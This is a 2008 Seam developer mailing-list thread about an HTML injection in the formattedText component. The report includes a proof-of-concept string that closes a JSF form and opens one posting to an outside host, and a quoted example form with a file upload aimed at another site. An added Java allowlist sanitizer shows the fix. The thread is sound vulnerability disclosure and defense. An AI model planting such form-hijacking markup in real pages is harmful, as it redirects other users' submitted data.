Please consider the following example:
<html
xmlns:h="http://java.sun.com/jsf/html"
xmlns:f="http://java.sun.com/jsf/core"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:rich="http://richfaces.org/rich"
xmlns:s="http://jboss.com/products/seam/taglib">
<body>
<h:form id="Form">
<s:formattedText value="#{bean.seamText}"/>
<h:commandButton value="Submit!"/>
</h:form>
</body>
</html>
bean.seamText =>
public String getSeamText() {
    // Raw HTML that closes the surrounding JSF form and opens a new one pointing at a foreign host
    return "<br></form><form action=\"http://www.jboss.org\"></br>";
}
Pressing the "Submit!" command button will submit the form to jboss.org instead of the application host, so one can potentially spy on other users.
Tested with Seam 2.1.0.beta1.
Best regards,
Nick Belaevski
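As an added example (not Seam's own code and not part of this thread), the defensive counterpart to the report above: an allowlist sanitizer run over user-supplied formatted text before it is rendered, so that a stray closing form tag or a nested form element is escaped as literal text instead of being interpreted by the browser. The class name, the allowlist and the tag regex are my own choices; attributes on allowed tags are dropped deliberately.

```java
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical sanitizer for HTML produced from user-controlled formatted text.
public class FormattedTextSanitizer {

    // Elements a formatted-text feature legitimately needs. form, input, script,
    // iframe and the like are absent and are therefore escaped, not rendered.
    private static final Set<String> ALLOWED = Set.of(
        "b", "i", "u", "p", "br", "ul", "ol", "li", "blockquote", "pre");

    // Any tag: group 1 is the optional '/' of a closing tag, group 2 the tag name.
    private static final Pattern TAG = Pattern.compile("<(/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>");

    public static String sanitize(String html) {
        Matcher m = TAG.matcher(html);
        StringBuilder out = new StringBuilder();
        int last = 0;
        while (m.find()) {
            out.append(html, last, m.start());          // text between tags is copied through
            String name = m.group(2).toLowerCase();
            if (ALLOWED.contains(name)) {
                // Re-emit only the bare tag so an allowed element cannot carry
                // attributes such as onclick="..." or formaction="...".
                out.append('<').append(m.group(1)).append(name).append('>');
            } else {
                // Disallowed tag: show its text literally rather than as markup.
                out.append(escape(m.group()));
            }
            last = m.end();
        }
        out.append(html, last, html.length());
        return out.toString();
    }

    static String escape(String s) {
        return s.replace("&", "&amp;").replace("<", "&lt;")
                .replace(">", "&gt;").replace("\"", "&quot;");
    }

    public static void main(String[] args) {
        // Constructed input: the payload from the report above.
        String payload = "<br></form><form action=\"http://www.jboss.org\"></br>";
        System.out.println(sanitize(payload));
    }
}
```

After sanitizing, the </form> and <form ...> tags appear in the page as escaped text, so the enclosing h:form keeps its original action.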
-----Original Message-----
From: Christian Bauer [mailto:cbauer@redhat.com]
Sent: Thursday, October 02, 2008 7:56 PM
To: Nick Belaevski
Cc: seam-dev(a)lists.jboss.org; Ilya Shaikovsky; Sergey Smirnov
Subject: Re: Form, Input Elements and SeamText
On Oct 02, 2008, at 18:50 , Nick Belaevski wrote:
> <form action="http://somesite.com"><input type="file" /><input type="submit" /></form>
>
> I suppose it is not safe that the user is able to type in forms.
Why not? Your browser can send whatever forms it wants to whatever site.